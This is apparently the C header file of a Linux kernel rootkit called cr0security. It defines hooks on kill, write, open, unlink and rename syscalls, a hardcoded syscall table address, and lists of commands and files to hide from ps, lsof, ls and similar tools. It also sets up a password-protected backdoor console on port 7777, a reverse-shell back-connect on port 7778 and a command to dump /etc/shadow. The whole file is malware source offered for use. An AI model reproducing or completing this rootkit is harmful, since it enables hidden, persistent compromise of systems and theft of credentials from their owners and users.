/*
* cr0security's rootkit header file
* (c) Copyright by Cr0security All Rights Reserved
* http://www.cr0security.com
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*
*/
#ifndef _cr0security_H_
#define _cr0security_H_
#define cr0security
/*cr_PID will be replaced by configure_lkm.pl , prevent opening /proc/ourpid */
#define cr_PID 16000
#define our_dmesg_path "/var/log/dmesg"
#define cr_PROC "cr0security"
#define cr_cocoa "cr0sec"
#define cr_panda "cr0"
#define GETOPT_LACK_VALIDATION_PATH "/home/ev1lut10n/Desktop/cr0security_lkm/"
#define cr_PORT "7777"
#define cr_PORT_HEX "1E61"
#define cr_backconnect_PORT "7778"
#define cr_backconnect_PORT_HEX "1E62"
#define int_cr_kern_port 3737
#define cr_kern_PORT_HEX "e99"
#define string_cr_kern_port "3737"
#define END {set_fs(old_fs);}
#define KERN {old_fs=get_fs(); set_fs(KERNEL_DS);}
#define TRUE 1
#define FALSE 0
#define PROC_NET_TCP "/proc/net/tcp"
#define the_pass "password:"
#define myprocessor "/home/ev1lut10n/Desktop/cr0security_lkm/cr0securityd"
/*0xc05d2180 will be replaced by configure_lkm.pl */
unsigned long *proto_sys_call = (unsigned long *) 0xc0595180;
unsigned long *invalid = (unsigned long *) 0xdeadbeef;
typedef int boolean;
size_t Length,Length2,Length3,Length4,Length5,Length6;
const char __user *buf_modified;
const char password[6] = "cr0sec";
const char null_terminate[5] = "\0x00";
char *mypassword;
char *tricky;
struct socket;
struct sockaddr;
struct sockaddr_in;
typedef int cr0;
typedef struct socket *cr0sock;
cr0sock server_sock,master_sock,mys0ck;
static cr0 result,panjang,total_pass,char_array;
static char cr0_buffer[980];
char *sockbuffer;
char *sockbuffer_cmd;
char *sockbuffer_menu_rootkit;
char *cmd_buffer;
char *clean_buffer;
char *envp[3];
char *two_last;
long r1m,r4m;
mm_segment_t old_fs;
static char valid_char[16] = {'b','c','s','e','x','i','t','h','d','w','o','p','r','1','a','l'};
static char  *log_path = "/bin/dat";
//static struct task_struct *tcpd_thread;
char* cr_motd = "\n========================================="
                                        "\nWelcome to Cr0security TCPD Console"
                                        "\n=========================================="
                                        "\navailable commands:\n"
                                        "bcs - shd - who - psa - prt - help - exit\n"
                                        "description:"
                                        "\nbcs - back connect to your current ip via port 7778 (setup netcat to listen on 7778)"
                                        "\nshd - seed command : view /etc/shadow"
                                        "\npsa - seed command : ps aux | tail"
                                        "\nwho - seed command : show who is logged on"
                                        "\nprt - print your command's result"
                                        "\nhelp - print this help"
                                        "\nexit - exit this console"
                                        "\nconsole > ";
char* cr_console = "\nconsole > ";
char* cr_failed_epic = "\nWrong password ! Access Denied\n";
static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr);
/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last);
*/
static int crdaemon(cr0sock master_sock,struct sockaddr_in master_addr);
static inline char *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode);
static inline size_t cr_send(struct socket *sock, const char *Buffer, size_t Length);
static inline ssize_t cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3);
char *log_path_buf3;
struct file *ev1l_proc,*ev1l_proc_net_tcp;
char *incoming_data;
char *successfull_msg = "Command has been executed successfully, to print the result type 'prt'\n";
char *failure = "Failed to execute your command !\n";
char hasil_konversi[10];
char predict_buffer[70];
char got_real_bufer[71];
cr0 status,konter,bit_mesin,nilai_kembali, bind, listen,cr0_data_size,__cr0_accept,____cr0_accept,ev1lmode,gmon_ops_return,i,j,executed,log_path_length;
char *tmp, *kern_heap, *kern_heap2;
cr0 *pointer_berupa_integer;
u_char *tmpbuf;
cr0 should_i_disable_sys_kill = 1;
cr0 sockbuf2_length,sockbuf1_length;
boolean found, cr0_stat, end_of_proc_net_tcp, already,validchar;
char *cr0_heap,*cr0_argumen,*str2;
cr0 how_much, len2, panjang_fake_net, panjang_fake_net_hex, panjang_dmesg_buffer, konter, rename_konter, konter2=0, totheap=0;
static cr0 dmesg_size = 256;
struct file *ev1l_dmesg,*raidon;
void *dmesg_buffer,*kmalloc_buffer,*k_m_a_l_l_o_c__b_u_f_f_e_r,*vmalloc_buffer,*unknown_buffer;
char *rkmalloc_buffer;
void *k_m_a_l_l_o_c__b_u_f_f_e_r;
boolean do_fake,do_fake_hex,rename_found;
unsigned long *retback_val;
char *file_buf,*lemme_lemme_maho,*rename_oldname;
static char *fake_net,*fake_net_hex;
/*msghdr for sock_rcvmsg and sock_sendmsg*/
typedef struct msghdr h4x0rmsg;
struct iovec iov;
/*ksocket header taken from ksocket made by @[email protected]*/
typedef struct socket *ksocket_t;
inline char *inet_ntoa(struct in_addr *in);
inline ksocket_t kaccept(ksocket_t socket, struct sockaddr *address, cr0 *address_len);
/*eof ksocket*/
boolean letmein;
size_t orig_len;
char *master_ip;
char *tmpbufx;
char *tmpcharbuf;
char *pointer;
static inline char* crtruncate(const char* str,cr0 len);
static inline char* replace_string(char *full_str,char *old_str, char *new_str);
static inline char *crinst(cr0 nomer);
static inline char *crflp_open(char *thecmd);
inline unsigned long *cr0repop(void *cr0_argumen);
static char cmd_pawned_cmd[11][7] = {{"pgrep"},{"ps"},{"pstree"},{"pmap"},{"grep"},{"lsof"},{"top"},{"ls"},{"dir"},{"kstat"},{"stat"}};
static char hijacked_syscall[6][12] = {{"sys_kill"},{"sys_write"},{"sys_unlink"},{"sys_unlinkat"},{"sys_open"},{"sys_rename"}};
static char forbidden_files_to_read[7][16] = {{"cr0security"},{"linux_"},{"exploit"},{"Makefile"},{"configure_lkm.pl"},{"install.pl"},{"/dev/kmem"}};
asmlinkage long (*chdir_asli)(const char __user *filename);
asmlinkage long (*rmdir_asli)(const char __user *pathname);
asmlinkage long  (*rename_asli)(const char __user *oldname,const char __user *newname);
asmlinkage long (*kill_asli)(cr0 pid, cr0 sig);
asmlinkage long (*write_asli)(unsigned int fd, const char __user *buf,size_t count);
asmlinkage long (*open_asli)(const char __user *filename,cr0 flags, cr0 mode);
asmlinkage long (*unlink_asli)(const char __user *pathname);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
asmlinkage long (*unlinkat_asli)(cr0 dfd, const char __user * pathname, cr0 flag);
#endif
#endif /*#ifndef _cr0security_H_*/